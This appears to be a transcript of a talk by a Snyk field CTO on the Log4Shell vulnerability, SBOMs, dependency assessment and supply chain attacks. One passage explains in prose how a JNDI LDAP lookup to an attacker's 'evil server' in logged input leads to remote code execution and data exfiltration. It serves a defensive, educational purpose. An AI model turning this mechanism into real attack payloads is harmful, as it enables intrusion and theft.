MMS • Simon Maple
Article originally posted on InfoQ. Visit InfoQ
Transcript
Maple: My name is Simon Maple. I’m the Field CTO at Snyk. We’re going to be looking at the impact that Log4Shell had on us as an ecosystem, and how we can better prepare ourselves for a future Log4Shell. I’ve been in Java for 20 years plus commercially, as a developer, as dev advocacy, as community, and now as a Field CTO at Snyk, which is a developer security company creating a platform to help developers add security into their developer workflows.
Outline
We’re going to be first of all looking at the Log4Shell incident, the vulnerability that existed in the Log4j library. We’re going to extract from that the bigger problems that can impact us in future in a similar way to Log4Shell. In fact, as I am recording this, we’re literally a day into another potential Log4Shell type incident, which is potentially being called Spring4Shell, or Spring Shell, which looks like another remote code execution incident that could potentially be in the Spring ecosystem. These are the types of incidents that we are looking to better prepare ourselves for in future. Once we talk about the steps we can take to really help ourselves to mitigate that, we’re going to look at what is actually beyond the Log4Shell risk, what is beyond that open source risk that we as Java developers and Java organizations, steps we can take to first of all understand where that risk is, and what steps we can actually take to better prepare ourselves and mitigate those risks as we go.
What Is Log4Shell?
Let’s jump in, first of all with what the Log4Shell incident was, and some of the bigger problems that we really can understand and take out for future learnings. This blog post is one of the blog posts that we wrote from Brian Vermeer, on December 10th, the day that the vulnerability came out. Of course, it had to be a Friday: Friday afternoon, Friday morning, where the Java ecosystem was alerted en masse at a new critical Log4j vulnerability. This was a remote code execution vulnerability. At the time, the suggested upgrade was to version 2.15. This was the version that at the time was thought to contain the entire fix for this incident. CVSS score, which is the score that is essentially almost built from a scorecard of a number of security questions to determine what the risk is, how easy it is to break into, that was given a 10. This is out of 10, so the highest possible score for that.
Java Naming and Directory Interface (JNDI)
Let’s dig a little bit deeper into what is actually happening under the covers and how this vulnerability came about. It really starts off with a couple of things, first of all, the JNDI, and secondly, Java serialization. The JNDI, the Java Naming and Directory Interface is essentially a service that is there by default in the JDK. It allows our applications that are deployed into a JDK to access potentially locally, like we’ve done here, a number of objects that can be registered into that JNDI. I’m sure there are many Java devs that are very familiar with this already. It’s been a very core part of the JDK for many years. Now, examples here, you might make a request with a particular string that is effectively the key of an object that has been registered in the JNDI. For example, env/myDS, my data source. You might want to qualify that with a java:comp, which is similar to a namespace/env/myDS. What we would get back is the myDS Java object, which we can then use to get data from a database.
We don’t always have to look to the local JNDI to register or get these objects. What we can also do is make a request out to a remote JNDI. In this case, here’s an example of what might happen if I was to create a remote evil JNDI, which I was to stand up on one of my evil servers. My application that I’ve deployed into the JDK can make a request out specifying, in this case, the JNDI LDAP server, parsing in an evil.server URL with a port here of 11, and requesting a bad object. What I would get back is a serialized object, bad, that I could reconstruct, and I could potentially execute there. Obviously, my application isn’t going to go out and request this bad object from my evil server. What an attacker would try and do to any attack vector here for this type of attack, is to parse in something to the application, so that the application will use that input that I give it to request something of my evil JNDI server?
That’s all very well and good, but what does this have to do with Log4j? We know Log4j is a logging environment, it’s a logging library and function. Why does that yield? What’s that got to do with the JNDI? Many years ago, I think it was around 2013, a feature was added into Log4j to be able to look up certain strings, certain properties for variables and things like that, configurations from the JNDI. Very often though, if a logger sees a string, which is a JNDI like lookup string, it will automatically try and perform that lookup as part of that request while logging. As a result, there is a potential to exploit something like this by trying to log a user input, which is a JNDI string, which contains my URL with an evil input, which will pull my evil object and potentially run that. Typically, login very often happens on exception parts and error parts. What we’re going to see here is an attempt for attackers to try and drive down an exception path with a payload of the JNDI string. That JNDI string will relate to my evil object, which in this case here it’s going to perform an exec parsing and maybe some sensitive data back to my URL, and I can extract credentials and other things. This is one example of what could happen.
One of the big problems with this specific vulnerability and what made this rock the Java ecosystem so much is the prevalence of Log4j, not just in the applications that we write, but in the third party libraries that we pull in, because of course, everyone needs logging, everyone uses some logging framework. The question is, how do we know that if we’re not using it, that someone we are relying on isn’t using it as well? That’s one of the biggest problems.
What Is the Industry Exposure?
At Snyk, we noticed the number of things from the customers that use us and are scanning with us, we noticed over a third of our customers are using Log4j. We scan a number of different ecosystems. The vast majority of our Java applications had Log4j in them, but 35% of overall customers had Log4j. Interestingly, 60%, almost two-thirds of those are using it as a transitive dependency. They’re not using it directly in their applications, but the libraries, the open source third-party packages that they are using are making use of Log4j. That makes it extremely hard to work out whether you have Log4j in your application or not. Because if you ask any developer, are you using Log4j? They’ll know if they’re interacting directly most likely with Log4j. However, do they know that three levels deep there is a library that they probably don’t even know they’re using that uses Log4j? Possibly not. The industry exposure as a result is very broad, because Log4j gets pulled in, in so many different places.
The Fix
What was the fix? If we look back at what the original fix or suggested fixes were, it’s important to note that this changed very rapidly as more information came in, and that is because this was a zero-day vulnerability. The exploit was effectively widely known before the vulnerability was even disclosed. As a result, everyone was chasing their tails in terms of trying to understand the severity, the risk, how things could be attacked. As a result, there was changing mitigation strategies and changing advice, depending on literally the hour of the day that it was going through. Here’s a cheat sheet that I wrote back in December, to really suggest a number of different ways that it could be fixed.
The important thing to note is the fix was made available very soon. The strongest mitigation case here was to upgrade Log4j at the time to version 2.15. Of course, in some cases, that wasn’t possible. There are certain times where we needed to say, what are the next steps then? The vast majority of people actually had a bigger problem before saying, let me just upgrade my Log4j. The biggest problem people had here was visibility, gaining visibility of all the libraries that they are using in production, all the libraries that their application is pulling in. There are a couple of ways of doing that. Of course, there are tools that can do a lot of that on your behalf. One of the things that you could do if you’re using something like Maven or Gradle, there were certain ways of pulling that data from your builds. However, it’s hard to be able to do that from a build process up, because essentially, you need to make sure that this is being used everywhere. It’s sometimes easier to look at it from the top-down, and actually be able to scan large repositories of your application so that you can get a good understanding from the top-down of what is in your environments, what is in your Git repositories, for example.
Obviously, the upgrade path here is heavily to upgrade. I believe we’re over in 2.17 these days in terms of what the suggested fixes are. However, for those who perhaps you’re using binaries, rather than actually pulling in, in your source. I think GitHub Enterprise, for example, was using Log4j. What do you do in that case where you can’t actually have access to the source to actually perform an upgrade? In some cases, there were certain classes that you could just remove from the JDK before restarting it. When you remove those classes, the vulnerable methods, the vulnerable functions had effectively been removed. It’s impossible to get to go down those paths. However, there are, of course, operational problems with that, because if you were to go through those paths, you might get unexpected behavior. Luckily, in this case, because people were either doing JNDI lookups on purpose or not, it was a little bit more predictable. It wasn’t something that was very core functionality.
There were some other things that could be done. Some of these were later on discovered that they weren’t as effective as others. Upgrading JDK is a good example whereby a lot of people said yes, that’s what you need to do straight away. However, after a little bit of time, it was discovered that that wasn’t as effective because attackers were mutating the way that they were approaching the attack, and circumventing some of the ways in which we’re trying to fix.That really goes and points to the way, which if we were to look at it from the runtime point of view, and look at things like egress traffic, look at things like WAFs, these are very short-lived fixes that we can put out. Because the ability for an attacker to change the way that they attack your environments changes literally, by the minute, by the day. Because as you block something in your WAF, your Web Application Firewall, which essentially is trying to block traffic inbound which has certain characteristics about the way it looks, an attacker would just say, “You’ve blocked that, I’ll find another way around it.” There’s always an edge case that attackers will find that can circumvent those kinds of attacks.
The last thing was really monitoring projects, and monitoring your environments. Because with these kinds of things, all the eyes go to these projects and try and understand whether the fix was correct, whether there are other ways which you can actually achieve the remote code execution in those projects. There were a number of future fixes that had to be rolled out as a result of this Log4Shell incident. As a result, it was very important at varying risks at different times. It was very important to monitor the upgrade so that as new vulnerabilities and CVEs were released, you were getting notified. Of course, there’s an amount of tooling which Snyk and others can provide to do this, but this was typically the remediation that was available. Of course, if you’re looking to still do these remediations, be sure to check online for the latest and greatest, to make sure that the version changes are including the latest movements from these libraries.
Log4j Timeline
Looking at the timeline, what can we learn from this? Obviously, we know that it was a zero-day. If you look at the timeline of when the code that introduced the vulnerability first came in, as I mentioned, 2013, almost nine years before. It wasn’t till 2021, late November, an Alibaba security researcher approached Apache with this disclosure, and it was being done with Apache. The problem is, when you actually roll out a fix, when you actually put a fix into an open source project, people can look at that and say, why are you making these code changes? They can see what you’re essentially defending against. What this can do then is actually almost partly disclose this type of vulnerability to the ecosystem, because all of a sudden, before others can actually start adopting that latest fix, you’re essentially showing where the attack vector can be breached through or exploited. This happened on December 9th, and straightaway a PoC was published on GitHub. It was leaked on Twitter as well. We know how this goes. It snowballs. December 10th was the officially disclosed CVE. Although this was leaked on Twitter and GitHub the day before, the CVE hadn’t even been published. At this stage you look here day by day, and the poor Log4j maintainers were working day and night on understanding where future issues and things like that could be found and fixed. That’s an interesting timeline there.
December 10th, on the Friday afternoon, I’m sure everyone was probably in the incident room getting a team together. The first question, which is very often the hardest question is, are we using Log4j? Where are we using it? How close are they to my critical systems? Are we exploitable? The most common questions. Can you answer that? Were you able to answer that straightaway? Those people who could, were very often in ownership of an SBOM, a software bill of materials. Software bill of materials is inventory. It’s like a library, essentially, that itemizes all the components, all the ingredients, as it were, that you are using to construct your applications and put them into your production environments. This will list all the third party libraries, all the third party components that you’re building in. What this will allow you to do is identify, in this case, are we using the Log4j-core, for example, and its particular version? Are we using a vulnerable version of Log4j? Are we using Log4j at all anywhere? What projects are we using it in? Where in the dependency graph are we using it? Is it a direct dependency? Is it somewhere down the line? Are they fixable? These were the questions that if we had this software bill of materials, we can answer extremely quickly.
Competing Standards
An SBOM, a software bill of materials, there are actually standards for this. There’s two competing standards right now which we’re likely to keep both in our industry. One is CycloneDX, one is SPDX. Essentially, they’re just different formats. One is under OWASP, the other the Linux Foundation. CycloneDX is one which is a little bit more developer focused, in the sense of what you’ll see is tooling and things that are being created more for the open source world where they can actually start testing and really getting hands-on quicker. The SPDX project is more standards based, and so a lot of the folks from standards backgrounds will tend to resonate more along this angle. Both are reasonable standards, and we’re going to likely see various tools that are probably going to support both. These are the formats that you can expect your SBOMs to exist. How can you create an SBOM? Of course, there are many tools out there, Snyk and others. There are plenty of tools out there whereby you can scan all of your repositories. It’ll take a look at your POM XML files, your Gradle build files, create dependency graphs. It will effectively give you this software bill of materials where you can identify and list, catalog the open source libraries that you’re using.
How to Prepare Better for the Next Log4Shell Style Incident
How can we prepare ourselves then better for the next Log4Shell style incident, whether that’s Spring4Shell right now? What can we do ourselves? There’s three things, and if you take DevSecOps as a good movement here, the three core pieces of DevSecOps are people, process, and tooling. These three are the core things which we need to look at in order to improve our posture around security. People here is the most important, so let’s start with people.
The Goal: Ownership Change
Within our organizations, DevOps has changed the way that we are delivering software. I remember 20 years ago when I was working with two year release cycles, people weren’t pushing to production anywhere near as fast as they are today, which tends to be daily. As a result, the more periodic security traditional audit style was more appropriate back then, compared to today. When we’re delivering and deploying to production multiple times a day in more of a CI/CD DevOps way, we need to recognize that every change that goes to production needs to be scanned in the same way as we would for quality, unit tests or integration tests and things like that. There’s two things that need to happen there. First of all, you tend to see 100 devs, 10 DevOps folks, and 1 security person. That one security person can’t be there to audit every change, to provide information about what to fix on every single change. As a result, we need an ownership change here. Shift left is good, maybe for a waterfall style, but this is very much more an efficiency play. This is doing something earlier. What we need here is an ownership change, where we go away from this dictatorial security providing for the developer, and more to empowering developers. We want to go from top to bottom. Rather than it’s a dictatorial model, you’re really empowering everyone who’s making those changes. There are a number of things that need to alter not just our outlook here, but our processes, the tools we choose. The core thing here is the responsibility that we as developers have in this new type of model.
Developer vs. Auditor Context
While we go into responsibility, let’s take a look at the context of difference in terms of how we look at things. A developer cares about the app, that’s their context. They want to get the app working. They want to get the app shipped. They care about various aspects of the app, not just security, whereas an auditor purely cares about risk. They care about what vulnerabilities exist here. What is the risk? What is my exposure in my environment? You zoom out, and the developer, they care about availability, they care about resilience. A huge number of things way beyond security. Whereas the auditor, they then care about, where’s my data? What other services are we depending on? How are they secure? They look at the overall risk that exists beyond the app. We have very different perspectives and points of view. As a result, we need to think about things differently. Auditors or security folks audit. What they care about is doing scans, running tests, creating tickets. That’s their resolution, the creating tickets. The developers, when we want to provide and empower developers in security, their end goal is to fix. They need to resolve issues. They need solutions that they can actually push through rather than just creating tickets. As a result, our mentality and the changes we need to make need to reflect this model.
Where Could Log4shell Have Been Identified?
Let’s take a look at Log4j now, and think about where we identified this issue. Where could have this exposure been identified? We couldn’t really do anything in our pipeline here, because we’re not introducing Log4Shell here. We were already in production. This is a zero-day. This is something whereby it is affecting us today and we need to react to that. This is a zero-day where we need to react as fast as we can. Of course, there are other ways, which we will cover. At its core, we need it to be on this right-hand side.
Assess Libraries You Adopt
Other things that we can do in order to address other issues. For example, what if we were on the left-hand side, and we’re introducing a library which potentially has a known vulnerability, or we just want to assess the risk? How much can we trust that library? There are things that we can do when we’re introducing libraries to avoid that potential Log4j style zero-day going forward. This is a guide. There are obviously certain anomalies that can exist, for example, Spring being one of them, which here today potentially has this Spring4Shell issue. When you’re using a library, it’s important for your developers to ask these questions as they introduce them. Assess these libraries when you’re using them. Don’t just pull them in because they have the functionality because they’re allowing you to do what you need to do in order to push this use case through.
Check maintenance. How active is the maintenance here? Look at the commits over the last year, is it an abandoned project? Is it something whereby if an issue was found, it would be resolved pretty quickly? How many issues are there? How many pull requests are currently open? What is the speed at which they’re being resolved? How long ago was the last release? Potentially, if there’s something that it depends on, and there is a new release of a version of a transitive dependency, how long will this library take in order to perform a release consuming that latest version? The maintenance is very important to consider.
Then, of course, next, the popularity. There’s a number of reasons why this is very useful. Popularity is a very important trend, so make sure you’re not the only person using this library, but this is in fact well trusted by the ecosystem. It’s something which lots of people rely on, and you’re not by yourself in a space whereby no one else is using these kinds of libraries. This reliance on a library will very often push things like the demand for maintenance and so forth.
Thirdly, security, in terms of looking at the most popular version that this library has released that people are using, and across the version ranges, where are security issues being added? How fast are they being resolved, both in your direct dependency for that library, and the transitives as well? If a transitive has a vulnerability, how soon is that being removed? Then, finally, the community. How active is the community? How many contributors are there in the community? How likely is it that if there’s obviously, just one or two contributors, does that give an amount of risk for this being a library that could potentially be abandoned, and so forth? With all of these metrics, what we want to pull together is essentially a health score. In this case, this is an npm package, for example, called Passport. This is a free advisor service that’s on the Snyk website, but we provide a score out of 100 to give you almost like a trust metric, or at least a health metric in terms of how reliable this library might be in your environment. You can run this thing across your dependency graph almost and identify where the weak points are for your dependency graph.
Rethink Process
When we think about other places, so for example, the Log4Shell thing happened when we were in production already. Could we have taken steps to identify potential libraries that are more prone to these kinds of things? We could have done that while we were coding before we add these in. Of course, anomalies are going to happen. Log4j is one of those very popular libraries that if you go through those kinds of processes, sometimes that thing is just going to happen. Sometimes you might think it’s less likely, potentially, for there to maybe be a malicious attack on Log4j, but potentially more likely for a risk to actually be a greater magnitude on the impact it can have on the ecosystem.
Of course, the other area where we can look at is known vulnerabilities. Known vulnerabilities are essentially a vulnerability which has potentially a CVE or other vulnerability databases. They have an entry there, which basically says, this is the vulnerability, this is how severe it is. This is the library it’s in with this version range, between ultimately where it was introduced, and just before it was fixed. This is where it exists in your environment. It’s very important to be able to automate those kind of checks to see when you create your dependency graph, if the libraries that have vulnerabilities in are being introduced into your applications through your builds. This could be done at various stages. You can automate this into your Git repository, so that as you create pull requests, you can automatically test whether the delta change is introducing new issues. That might be license issues or security vulnerabilities. This is a great way of being able to, rather than look at potentially a big backlog, make sure you improve your secure development, just by looking at your future development first.
You can of course test in your CI/CD as well. Run tests in your Jenkins builds. There’s the opportunity here to block and make sure that if we get a very critical high severity vulnerability, we just don’t want to push this through. Very often, that can cause issues with a nicely, very slick, fast moving build process. You want to judge where you want to be more aggressive, where you want to be less aggressive, and more, be there for visibility, and be there to raise tickets potentially with an SLA to fix within a certain number of days. The core thing is run automation at these various points and have that awareness and that feedback to your developers as early as their IDE, with integrations and things like that.
Rethinking Tooling
One of the core things that we mentioned previously was about developer tooling and giving your development teams tools that will address what their needs for security are. That is to fix, not just to be an auditor, and to find. Here are some of the things that you need to think about when trying to work out what tooling your development teams should have. Make sure there’s a self-service model to use those tools. Make sure there’s plenty of documentation that your teams, as well as the vendor is creating for that. The Rich API, and the command line interface, and the number of integrations is core as well, as well as having a big open source community behind it. From a platform scope, there are many security acronyms, DAST, SAST, IAST, which tend to look more to your code, but think about the wider, more broader application that you’re delivering as a cloud native application security concern. Finally, the one piece that I want to stress here is this governance approach. When you’re looking at a tool, ask the question, is this tool empowering me as a developer or my developers, or is it dictating to my developers? That will help you determine whether this is a tool that should fit in your DevOps process, or whether it doesn’t fit the process or the model that you’re striving for?
Cloud Moves IT Stack into App
Finally, we’re going to talk about what’s beyond the Log4Shell risk in our applications. This is beyond open source libraries. When we think about how we as developers used to write code many years ago, certainly when I started 20 years ago, pre-cloud, we thought about the open source libraries that we used to develop. We thought about the application code that we used to develop. We used to consume open source libraries as well as developing them ourselves. This constituted the application which we then threw over the wall to an operations team that looked after the platform, looked after the operations piece, the production environment. Whereas today in a cloud environment, so much of that is now more under the control, more under the governance, the development of a regular application. The Docker files, the infrastructure as code, whether it’s Terraform scripts, Kubernetes config, these are the more typical things that we as developers are touching on a day-to-day basis. As a result, we need more of an AppSec solution to make sure that things that we change, things that we touch are being done in a secure manner. A lot of the time all of these things are existing in our Git repositories. As a result, they’re going through the development workflows. What we need to be able to do is make sure we have solutions in place, which test these in that development workflow, in our IDEs, in our GitHub repositories, and so forth.
Rethinking Priorities
When we think about traditionally, as developers potentially looking at what we are securing, we absolutely go straight to our own code. While this is an important thing to statically test, as well as dynamically test, it’s important to look at what’s beneath the water almost as that iceberg. Open source code, you can tone as your infrastructure as code, your misconfigurations there, think about where you are most likely to be breached. Is it an open source library, is it your own code, or is it an S3 bucket where there’s a misconfiguration? Is there a container that contains vulnerabilities in the open source packages? Look at this as one, and trying to identify where your most critical issues are based on the stack that you are using.
Supply Chain Security: A Novel Application Risk
One of the last things here I want to cover really is something called the supply chain. Maybe you’ve heard a lot about supply chain security, supply chain risk more recently. The problem is essentially when I started in my development days, we had very much internal build systems, internal build. We had build engineers that were running builds literally on our own data centers. Much more of that is now done by third party software, done by SaaS software, potentially, as well. It’s a much more complex pipeline that we’ve built up over the last couple of decades. There’s a lot of trust that we need to put on many of these different components in this pipeline. Additionally, we need to understand what’s in that pipeline, but also where the weak links are in our chain, where the weak links are in our supply chain as well as that pipeline to identify where we are most vulnerable.
Let’s take a look at where the security risks are potentially, as part of our pipeline. First of all, we have the pipeline that we deliver. We as developers checking code into Git, pushing to a build pipeline, storing perhaps in an artifact repository before pushing to a consumer, maybe into our production environment, or to another supply chain, potentially as well. The thing that we’ve mentioned mostly here is these third party libraries. There’s two pieces here, one is the risk that we add into our application from our supply chain. The second one is a potential supply chain attack. The two are quite different. The second one there is about a compromise of our dependency.
Do you think Log4j, Log4Shell, was a supply chain attack? Is it a supply chain attack? Think about who the attacker is. Who is the attacker that is potentially trying to perform the attack? What are they trying to attack? What is it that they are trying to break, trying to attack, trying to compromise? They’re typically some attacker out there who is trying to break your application that contains Log4j. They’re attacking your application, they’re not attacking your supply chain. Log4j is providing you with supply chain risk, but it’s not a supply chain attack. An attack on your supply chain is where the attacker is trying to intentionally break, maybe a library, maybe trying to compromise your library, your container, for example, and other things that we’ll talk about. The attacker is breaking your supply chain. They’re not trying to attack your application. They’re not trying to attack your endpoints. They’re trying to break your supply chain. The actual attack vector will get introduced in your supply chain. They’re not trying to attack an endpoint or attack something that you’ve put into production.
Obviously, containers, very similar there with vulnerabilities or compromises that can come in through your container images as well, public container images. A second one is a compromise of the pipeline, compromise of developer code. Someone trying to attack your Git repository. Someone trying to break into your build through misconfigurations in your build environments, potentially. Unauthorized attacks into your pipeline. Then the third piece of a supply chain attack is this compromise of a pipeline dependency. For example, Codecov was one. SolarWinds was another one here with the build tools and the Codecov plugin that was added here. They were compromised and they were added as a CI plugin, Codecov as a CI plugin. The compromised malicious version of that plugin was added into other people’s pipelines, attacking their pipelines, taking credentials, taking environment variables and sending it off to evil servers. This is what a supply chain attack really looks like.
These are potentially very lucrative to exploit because if you look at Codecov, that was a cascading supply chain attack. The actual attack happened on the Codecov supply chain that was then used in other supply chain, so it cascades to huge numbers of pipelines, giving out huge numbers of credentials. This is where we’re thinking beyond the open source libraries. Cascading effects are some of the biggest ones that can be attacked.
Conclusion
Hopefully, that gives you a good insight here into actionable tips that you can actually take away, and also areas of risk that you can look at, because while today it’s Log4Shell or Spring4Shell, tomorrow there could be another attack vector. We need to think very holistically about the overall application that we’re deploying, and where the greatest risk in our processes, our teams, and where our tooling can really help us out there.
See more presentations with transcripts